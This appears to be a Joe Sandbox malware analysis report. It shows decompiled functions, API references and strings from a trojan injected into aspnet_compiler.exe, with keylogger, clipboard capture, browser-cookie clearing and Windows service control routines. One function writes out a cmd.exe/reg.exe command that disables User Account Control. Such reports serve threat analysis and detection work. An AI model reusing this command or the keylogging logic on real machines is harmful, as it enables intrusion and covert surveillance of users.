                    					E00412B5F(0x473238, E00401F8B(0x473238), "FR", 1);
                    				}
                    				 *0x470b1a = 0;
                    				return 0;
                    			}


                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: [Cleared browsers logins and cookies.]$82G$Cleared browsers logins and cookies.$4G
                    • API String ID: 3472027048-2766125209
                    • Opcode ID: 6edb077d68d4f3ae3194ad966572f3ddeabe56104e8ff8a515528542a4f313e5
                    • Instruction ID: b4021fb9e4edc30202d34e01d01bd8d1c2d2826e69326faececa9b35d7d9af25
                    • Opcode Fuzzy Hash: 6edb077d68d4f3ae3194ad966572f3ddeabe56104e8ff8a515528542a4f313e5
                    • Instruction Fuzzy Hash: D831860474C3806DDA116B7558667AB6F928EA3758F0844FFB8C4273C3DA7B490993AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E004197D3(signed char __ecx, char _a4) {
                    				signed char _v5;
                    				void* _t7;
                    				signed int _t11;
                    				void* _t17;
                    				short* _t21;
                    				signed int _t24;
                    				int _t25;
                    				void* _t28;
                    				void* _t31;
                    
                    				_push(__ecx);
                    				_t21 = 0;
                    				_v5 = __ecx;
                    				_t7 = OpenSCManagerW(0, 0, 2);
                    				_t24 =  &_a4;
                    				_t31 = _t7;
                    				_t28 = OpenServiceW(_t31, E00401EE4(_t24), 2);
                    				if(_t28 != 0) {
                    					_t25 = _t24 | 0xffffffff;
                    					_t11 = _v5 & 0x000000ff;
                    					if(_t11 == 0) {
                    						_push(4);
                    						goto L8;
                    					} else {
                    						_t17 = _t11 - 1;
                    						if(_t17 == 0) {
                    							_push(2);
                    							goto L8;
                    						} else {
                    							if(_t17 == 1) {
                    								_push(3);
                    								L8:
                    								_pop(_t25);
                    							}
                    						}
                    					}
                    					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
                    					CloseServiceHandle(_t31);
                    					CloseServiceHandle(_t28);
                    				} else {
                    					CloseServiceHandle(_t31);
                    				}
                    				E00401EE9();
                    				return _t21;
                    			}













                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418EE9,00000000), ref: 004197E3
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418EE9,00000000), ref: 004197F7
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 00419804
                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418EE9,00000000), ref: 00419839
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 0041984B
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 0041984E
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                    • String ID:
                    • API String ID: 493672254-0
                    • Opcode ID: a43a9075f9a256d01b940b957f891354bde14e8d54348ae68c94c0b261ae2992
                    • Instruction ID: a47b9f36788e1574db55dd564176aee803a97132f2343e107bd38cafad37238b
                    • Opcode Fuzzy Hash: a43a9075f9a256d01b940b957f891354bde14e8d54348ae68c94c0b261ae2992
                    • Instruction Fuzzy Hash: 280149311592147AD6146B34AC6EEBB3B9CDB03770F10033BF525921D2DA68CD45C1E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E00446A95(void* __ebx, void* __ecx, void* __edx) {
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t2;
                    				void* _t3;
                    				void* _t4;
                    				intOrPtr _t9;
                    				void* _t11;
                    				void* _t20;
                    				void* _t21;
                    				void* _t23;
                    				void* _t25;
                    				void* _t27;
                    				void* _t29;
                    				void* _t31;
                    				void* _t32;
                    				long _t36;
                    				long _t37;
                    				void* _t40;
                    
                    				_t29 = __edx;
                    				_t23 = __ecx;
                    				_t20 = __ebx;
                    				_t36 = GetLastError();
                    				_t2 =  *0x46f1dc; // 0x6
                    				_t42 = _t2 - 0xffffffff;
                    				if(_t2 == 0xffffffff) {
                    					L2:
                    					_t3 = E004443F4(_t23, 1, 0x364);
                    					_t31 = _t3;
                    					_pop(_t25);
                    					if(_t31 != 0) {
                    						_t4 = E00447092(_t25, _t36, __eflags,  *0x46f1dc, _t31);
                    						__eflags = _t4;
                    						if(_t4 != 0) {
                    							E00446907(_t25, _t31, 0x470664);
                    							E00445002(0);
                    							_t40 = _t40 + 0xc;
                    							__eflags = _t31;
                    							if(_t31 == 0) {
                    								goto L9;
                    							} else {
                    								goto L8;
                    							}
                    						} else {
                    							_push(_t31);
                    							goto L4;
                    						}
                    					} else {
                    						_push(_t3);
                    						L4:
                    						E00445002();
                    						_pop(_t25);
                    						L9:
                    						SetLastError(_t36);
                    						E004449F5(_t20, _t29, _t31, _t36);
                    						asm("int3");
                    						_push(_t20);
                    						_push(_t36);
                    						_push(_t31);
                    						_t37 = GetLastError();
                    						_t21 = 0;
                    						_t9 =  *0x46f1dc; // 0x6
                    						_t45 = _t9 - 0xffffffff;
                    						if(_t9 == 0xffffffff) {
                    							L12:
                    							_t32 = E004443F4(_t25, 1, 0x364);
                    							_pop(_t27);
                    							if(_t32 != 0) {
                    								_t11 = E00447092(_t27, _t37, __eflags,  *0x46f1dc, _t32);
                    								__eflags = _t11;
                    								if(_t11 != 0) {
                    									E00446907(_t27, _t32, 0x470664);
                    									E00445002(_t21);
                    									__eflags = _t32;
                    									if(_t32 != 0) {
                    										goto L19;
                    									} else {
                    										goto L18;
                    									}
                    								} else {
                    									_push(_t32);
                    									goto L14;
                    								}
                    							} else {
                    								_push(_t21);
                    								L14:
                    								E00445002();
                    								L18:
                    								SetLastError(_t37);
                    							}
                    						} else {
                    							_t32 = E0044703C(_t25, _t37, _t45, _t9);
                    							if(_t32 != 0) {
                    								L19:
                    								SetLastError(_t37);
                    								_t21 = _t32;
                    							} else {
                    								goto L12;
                    							}
                    						}
                    						return _t21;
                    					}
                    				} else {
                    					_t31 = E0044703C(_t23, _t36, _t42, _t2);
                    					if(_t31 != 0) {
                    						L8:
                    						SetLastError(_t36);
                    						return _t31;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    			}






















                    APIs
                    • GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                    • _free.LIBCMT ref: 00446ACC
                    • _free.LIBCMT ref: 00446AF4
                    • SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                    • SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                    • _abort.LIBCMT ref: 00446B13
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: 806b9488dbb5f67dc4a24e364a824df2f5f943de60d9707ff7ce2e9c29f9cb7b
                    • Instruction ID: 6a8f3ccd0764d1e9e7d83ebdae3328841d1b307594cb58bb8d86c94d160514c2
                    • Opcode Fuzzy Hash: 806b9488dbb5f67dc4a24e364a824df2f5f943de60d9707ff7ce2e9c29f9cb7b
                    • Instruction Fuzzy Hash: 9FF0D675105B0166F612B325BC06E6B2A558BD3B69F22403BF904E22D2EF6DC806816E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00419601(char _a4) {
                    				struct _SERVICE_STATUS _v32;
                    				signed int _t16;
                    				void* _t19;
                    				void* _t20;
                    
                    				_t16 = 0;
                    				_t20 = OpenSCManagerW(0, 0, 0x20);
                    				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x20);
                    				if(_t19 != 0) {
                    					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
                    					CloseServiceHandle(_t20);
                    					CloseServiceHandle(_t19);
                    				} else {
                    					CloseServiceHandle(_t20);
                    				}
                    				E00401EE9();
                    				return _t16;
                    			}








                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041917E,00000000), ref: 00419610
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041917E,00000000), ref: 00419624
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419631
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041917E,00000000), ref: 00419640
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419652
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419655
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: cbdbfd916c004d7569b47b9bd6e1a80b4622c8ade61d2382c09d422603b39a17
                    • Instruction ID: a7ca8c43b745447570174616d627e1def875c64aa7390fdce4b26778a5b79433
                    • Opcode Fuzzy Hash: cbdbfd916c004d7569b47b9bd6e1a80b4622c8ade61d2382c09d422603b39a17
                    • Instruction Fuzzy Hash: 4EF0C2315003186BD210AF65AC89DBF3BECDB45BA1F00007AFD09921D2DA28CD4685F9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041976C(char _a4) {
                    				struct _SERVICE_STATUS _v32;
                    				signed int _t16;
                    				void* _t19;
                    				void* _t20;
                    
                    				_t16 = 0;
                    				_t20 = OpenSCManagerW(0, 0, 0x40);
                    				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x40);
                    				if(_t19 != 0) {
                    					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
                    					CloseServiceHandle(_t20);
                    					CloseServiceHandle(_t19);
                    				} else {
                    					CloseServiceHandle(_t20);
                    				}
                    				E00401EE9();
                    				return _t16;
                    			}








                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041907E,00000000), ref: 0041977B
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041907E,00000000), ref: 0041978F
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 0041979C
                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041907E,00000000), ref: 004197AB
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 004197BD
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 004197C0
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: ffd2befe680986fb8d9ca3f791f35c957ef4c0d05e77ac45e50e77df66c7c54e
                    • Instruction ID: a5790d775f0640958528a35b07e9f071147c503c7fab8b2ef1513a048adfe726
                    • Opcode Fuzzy Hash: ffd2befe680986fb8d9ca3f791f35c957ef4c0d05e77ac45e50e77df66c7c54e
                    • Instruction Fuzzy Hash: 62F0C271501218ABD210AF65EC89DBF3BECDF45BA5B00007AFE09921D2DA38CD4685E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00419705(char _a4) {
                    				struct _SERVICE_STATUS _v32;
                    				signed int _t16;
                    				void* _t19;
                    				void* _t20;
                    
                    				_t16 = 0;
                    				_t20 = OpenSCManagerW(0, 0, 0x40);
                    				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x40);
                    				if(_t19 != 0) {
                    					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
                    					CloseServiceHandle(_t20);
                    					CloseServiceHandle(_t19);
                    				} else {
                    					CloseServiceHandle(_t20);
                    				}
                    				E00401EE9();
                    				return _t16;
                    			}








                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004190FE,00000000), ref: 00419714
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004190FE,00000000), ref: 00419728
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419735
                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,004190FE,00000000), ref: 00419744
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419756
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419759
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: 8b303968575a6564753f9d8b246513a52dc4537e48e1e6f0537c890e477d9e22
                    • Instruction ID: 8fc70a690c960e854b45078eaab18319365206aebec4e159bed8ee303a354907
                    • Opcode Fuzzy Hash: 8b303968575a6564753f9d8b246513a52dc4537e48e1e6f0537c890e477d9e22
                    • Instruction Fuzzy Hash: 74F0C2715002186BD210AF65AC89DBF3BECDF45BA1F40007AFE09A61D2DB38CD4585E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E00441D05(void* __ecx, void* __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				void* _v12;
                    				char _v16;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t36;
                    				struct HINSTANCE__* _t37;
                    				struct HINSTANCE__* _t43;
                    				intOrPtr* _t44;
                    				intOrPtr* _t45;
                    				CHAR* _t49;
                    				struct HINSTANCE__* _t50;
                    				void* _t52;
                    				struct HINSTANCE__* _t55;
                    				intOrPtr* _t59;
                    				struct HINSTANCE__* _t64;
                    				intOrPtr _t65;
                    
                    				_t52 = __ecx;
                    				if(_a4 == 2 || _a4 == 1) {
                    					E0044D8D9(_t52);
                    					GetModuleFileNameA(0, 0x4703d8, 0x104);
                    					_t49 =  *0x470a50; // 0xec3458
                    					 *0x470a58 = 0x4703d8;
                    					if(_t49 == 0 ||  *_t49 == 0) {
                    						_t49 = 0x4703d8;
                    					}
                    					_v8 = 0;
                    					_v16 = 0;
                    					E00441E29(_t52, _t49, 0, 0,  &_v8,  &_v16);
                    					_t64 = E00441F9E(_v8, _v16, 1);
                    					if(_t64 != 0) {
                    						E00441E29(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                    						if(_a4 != 1) {
                    							_v12 = 0;
                    							_push( &_v12);
                    							_t50 = E0044D3F4(_t49, 0, _t64, _t64);
                    							if(_t50 == 0) {
                    								_t59 = _v12;
                    								_t55 = 0;
                    								_t36 = _t59;
                    								if( *_t59 == 0) {
                    									L15:
                    									_t37 = 0;
                    									 *0x470a44 = _t55;
                    									_v12 = 0;
                    									_t50 = 0;
                    									 *0x470a48 = _t59;
                    									L16:
                    									E00445002(_t37);
                    									_v12 = 0;
                    									goto L17;
                    								} else {
                    									goto L14;
                    								}
                    								do {
                    									L14:
                    									_t36 = _t36 + 4;
                    									_t55 =  &(_t55->i);
                    								} while ( *_t36 != 0);
                    								goto L15;
                    							}
                    							_t37 = _v12;
                    							goto L16;
                    						}
                    						 *0x470a44 = _v8 - 1;
                    						_t43 = _t64;
                    						_t64 = 0;
                    						 *0x470a48 = _t43;
                    						goto L10;
                    					} else {
                    						_t44 = E0043EEAD();
                    						_push(0xc);
                    						_pop(0);
                    						 *_t44 = 0;
                    						L10:
                    						_t50 = 0;
                    						L17:
                    						E00445002(_t64);
                    						return _t50;
                    					}
                    				} else {
                    					_t45 = E0043EEAD();
                    					_t65 = 0x16;
                    					 *_t45 = _t65;
                    					E0043A5BB();
                    					return _t65;
                    				}
                    			}






















                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 00441D45
                    • _free.LIBCMT ref: 00441E10
                    • _free.LIBCMT ref: 00441E1A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$X4
                    • API String ID: 2506810119-1644649123
                    • Opcode ID: fb92f241e2e05432639b7b32ac1502f6d059981408861d6403be201cf46156aa
                    • Instruction ID: c557cc44e93a4f3526c8424d226de774fcc48449be6b5aaf792980d9704e92f2
                    • Opcode Fuzzy Hash: fb92f241e2e05432639b7b32ac1502f6d059981408861d6403be201cf46156aa
                    • Instruction Fuzzy Hash: 663173B5E01258EFEB21DB99D88199FBBBCEB44314F10406BF80897221D6749A818799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E0040ACBE(void* __ecx) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t23;
                    				void* _t27;
                    				void* _t30;
                    				void* _t78;
                    				void* _t84;
                    				void* _t85;
                    				void* _t86;
                    
                    				_t86 = _t85 - 0x94;
                    				_t78 = __ecx;
                    				if( *0x474c4c >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                    					E00432CF1(0x474c4c);
                    					_t89 =  *0x474c4c - 0xffffffff;
                    					if( *0x474c4c == 0xffffffff) {
                    						E00401F66(0x474c50, 0x474c50);
                    						E0043307B(_t89, E004568E0);
                    						E00432CB2(0x474c4c, 0x474c4c);
                    					}
                    				}
                    				E0040AC84( &_v28);
                    				_t23 = E0040AF46(0x474c50);
                    				_t90 = _t23;
                    				if(_t23 == 0) {
                    					E0040AE66(0x474c50,  &_v28);
                    					_t27 = E00406E2B(_t90);
                    					_t91 = _t27;
                    					if(_t27 != 0) {
                    						E00402073(0x474c50,  &_v76, 0x46a8f0, _t84, "\r\n[End of clipboard]\r\n");
                    						E00402073(0x474c50,  &_v52, 0x46a8f0, _t84, "\r\n[Text copied to clipboard]\r\n");
                    						_t30 = E0041A7B9( &_v148,  &_v76);
                    						E00402F85(_t86 - 0x18, E004042FD(0x474c50,  &_v100, E0041A7B9( &_v124,  &_v52), _t84, _t91, 0x474c50), _t30);
                    						E00409BA9(_t78);
                    						E00401EE9();
                    						E00401EE9();
                    						E00401EE9();
                    						E00401FB8();
                    						E00401FB8();
                    					}
                    				}
                    				return E00401EE9();
                    			}

                    APIs
                      • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                    • __Init_thread_footer.LIBCMT ref: 0040AD0D
                    Strings
                    • API ID: Init_thread_footer__onexit
                    • String ID: [End of clipboard]$[Text copied to clipboard]$LLG$PLG
                    • API String ID: 1881088180-1960277357

                    C-Code - Quality: 85%
                    			E0040977E(void* __ecx, char* __edx, char _a4) {
                    				char _v28;
                    				char _v32;
                    				void* _v56;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t21;
                    				void* _t39;
                    				void* _t41;
                    				signed int _t42;
                    				void* _t44;
                    
                    				_t33 = __edx;
                    				_t44 = (_t42 & 0xfffffff8) - 0x1c;
                    				_push(_t21);
                    				_t39 = __ecx;
                    				 *((char*)(__ecx + 0x49)) = 1;
                    				E0040AE66(__ecx + 0x60,  &_a4);
                    				_t48 =  *0x46f9d4 - 0x32;
                    				_t35 = "Offline Keylogger Started";
                    				if( *0x46f9d4 != 0x32) {
                    					E00402073(_t21,  &_v28, __edx, _t41, "Offline Keylogger Started");
                    					_t44 = _t44 - 0x18;
                    					_t33 =  &_v32;
                    					E0041A7B9(_t44,  &_v32);
                    					E0040A6DA(_t21, _t39, _t48);
                    					E00401FB8();
                    				}
                    				_t45 = _t44 - 0x18;
                    				E00402073(_t21, _t44 - 0x18, _t33, _t41, _t35);
                    				E00402073(_t21, _t45 - 0x18, _t33, _t41, "i");
                    				E0041A04A(_t21, _t35);
                    				CreateThread(0, 0, E00409880, _t39, 0, 0);
                    				if( *_t39 == 0) {
                    					CreateThread(0, 0, E0040986A, _t39, 0, 0);
                    				}
                    				CreateThread(0, 0, E0040988C, _t39, 0, 0);
                    				return E00401EE9();
                    			}

                    APIs
                    • CreateThread.KERNEL32 ref: 00409806
                    • CreateThread.KERNEL32 ref: 00409816
                    • CreateThread.KERNEL32 ref: 00409822
                      • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                      • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                    Strings
                    • API ID: CreateThread$LocalTimewsprintf
                    • String ID: Offline Keylogger Started$Cqt
                    • API String ID: 465354869-147018579

                    C-Code - Quality: 53%
                    			E0040A6DA(void* __ebx, void* __ecx, void* __eflags, char _a4) {
                    				struct _SYSTEMTIME _v20;
                    				char _v44;
                    				char _v68;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				WCHAR* _t28;
                    				void* _t61;
                    				void* _t62;
                    				void* _t64;
                    				void* _t65;
                    				void* _t66;
                    
                    				_t66 = __eflags;
                    				_t61 = __ecx;
                    				GetLocalTime( &_v20);
                    				E00401EF3( &_a4, _t21, _t62, E00402FF4(__ebx,  &_v44, E0040AEF6( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t64,  &_a4), _t61, _t64, _t66, L"]\r\n"));
                    				E00401EE9();
                    				E00401EE9();
                    				_push(0x64 + E0040245C() * 2);
                    				_t28 = E0043A620( &_a4);
                    				_push(_v20.wSecond & 0x0000ffff);
                    				_push(_v20.wMinute & 0x0000ffff);
                    				_push(_v20.wHour & 0x0000ffff);
                    				_push(_v20.wDay & 0x0000ffff);
                    				_push(_v20.wMonth & 0x0000ffff);
                    				wsprintfW(_t28, E00401EE4( &_a4));
                    				E0040415E(__ebx, _t65, _t21, _t64, _t28);
                    				E00409BA9(_t61, _v20.wYear & 0x0000ffff);
                    				L0043A61B(_t28);
                    				return E00401EE9();
                    			}

                    APIs
                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                    • wsprintfW.USER32 ref: 0040A769
                      • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                    Strings
                    • API ID: EventLocalTimewsprintf
                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                    • API String ID: 1497725170-248792730

                    C-Code - Quality: 70%
                    			E0041BE1A() {
                    				char _v20;
                    				struct _WNDCLASSEXA _v68;
                    				void* __edi;
                    				struct HWND__* _t20;
                    				void* _t23;
                    
                    				E00435760(_t23,  &(_v68.style), 0, 0x2c);
                    				_v68.cbSize = 0x30;
                    				_v68.style = 0;
                    				_v68.lpfnWndProc = E0041BE9A;
                    				_v68.cbClsExtra = 0;
                    				asm("movsd");
                    				_v68.lpszClassName =  &_v20;
                    				_v68.cbWndExtra = 0;
                    				asm("movsd");
                    				_v68.lpszMenuName = 0;
                    				asm("movsd");
                    				asm("movsw");
                    				asm("movsb");
                    				if(RegisterClassExA( &_v68) == 0) {
                    					L3:
                    					return 0;
                    				}
                    				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                    				if(_t20 == 0) {
                    					GetLastError();
                    					goto L3;
                    				}
                    				return _t20;
                    			}

                    APIs
                    Strings
                    • API ID: ClassCreateErrorLastRegisterWindow
                    • String ID: 0$MsgWindowClass
                    • API String ID: 2877667751-2410386613

                    C-Code - Quality: 100%
                    			E00406DC9() {
                    				struct _PROCESS_INFORMATION _v20;
                    				struct _STARTUPINFOA _v92;
                    				void* __edi;
                    				long _t18;
                    
                    				_t18 = 0x44;
                    				E00435760(0,  &_v92, 0, _t18);
                    				_v92.cb = _t18;
                    				E00435760(0,  &_v20, 0, 0x10);
                    				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
                    				CloseHandle(_v20);
                    				return CloseHandle(_v20.hThread);
                    			}

                    APIs
                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406E0F
                    • CloseHandle.KERNEL32(?), ref: 00406E1E
                    • CloseHandle.KERNEL32(?), ref: 00406E23
                    Strings
                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00406E05
                    • C:\Windows\System32\cmd.exe, xrefs: 00406E0A
                    • API ID: CloseHandle$CreateProcess
                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                    • API String ID: 2922976086-4183131282

                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00441BBB,?,?,00441B5B,?), ref: 00441C2A
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00441C3D
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00441BBB,?,?,00441B5B,?), ref: 00441C60
                    Strings
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045

                    C-Code - Quality: 87%
                    			E004050C4(void* __ecx, void* __ebp, char _a4) {
                    				void* _t17;
                    				void* _t21;
                    				void* _t22;
                    				void* _t23;
                    				void* _t25;
                    
                    				_t23 = __ecx;
                    				if( *((char*)(__ecx + 0x5c)) == 0) {
                    					return 0;
                    				}
                    				if(_a4 == 0) {
                    					_t26 = _t25 - 0x18;
                    					E00402073(_t17, _t25 - 0x18, _t21, __ebp, "KeepAlive             | Disabled");
                    					E00402073(_t17, _t26 - 0x18, _t21, __ebp, "!");
                    					E0041A04A(_t17, _t22);
                    				}
                    				 *(_t23 + 0x64) = CreateEventA(0, 0, 0, 0);
                    				SetEvent( *(_t23 + 0x60));
                    				WaitForSingleObject( *(_t23 + 0x64), 0xffffffff);
                    				CloseHandle( *(_t23 + 0x64));
                    				return 1;
                    			}

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    Strings
                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                    • String ID: KeepAlive | Disabled
                    • API String ID: 2993684571-305739064

                    C-Code - Quality: 87%
                    			E0041991B(WCHAR* __ecx) {
                    				void* __edi;
                    				void* _t7;
                    				void* _t11;
                    				void* _t12;
                    				WCHAR* _t14;
                    				void* _t16;
                    				void* _t17;
                    
                    				_t18 = _t17 - 0x18;
                    				_t14 = __ecx;
                    				E00402073(_t7, _t17 - 0x18, _t11, _t16, "Alarm triggered");
